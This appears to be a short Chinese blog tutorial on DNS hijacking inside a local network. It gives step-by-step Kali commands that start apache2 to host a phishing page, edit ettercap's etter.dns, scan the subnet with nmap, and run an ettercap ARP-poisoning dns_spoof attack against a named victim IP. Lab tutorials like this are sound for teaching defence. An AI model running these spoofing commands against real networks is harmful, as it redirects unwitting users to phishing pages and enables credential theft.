内网渗透之dns劫持

DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站,

实验工具:
kali linux 黑客机
win10 肉鸡
apache2
ettercap

操作步骤
1,打开kali上的apache2服务,
@kali:~# service apache2 start
root@kali:~# service apache2 status
绿点就是已经开启了。
内网渗透之dns劫持_第1张图片

2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下
@kali:~#vim /var/www/html/index.html
内网渗透之dns劫持_第2张图片

3,修改ettercap DNS文件;
ot@kali:~# vim /etc/ettercap/etter.dns
A 192.168.1.112 (黑客机IP地址)
内网渗透之dns劫持_第3张图片

4,寻找目标IP
kali:~# nmap -sP 192.168.1.1-255

5,发起欺骗
kali:~# ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.132///
IP地址是被攻击的主机,

6,被攻击的主机访问任意网站的回被劫持,

你可能感兴趣的:(安全,安全)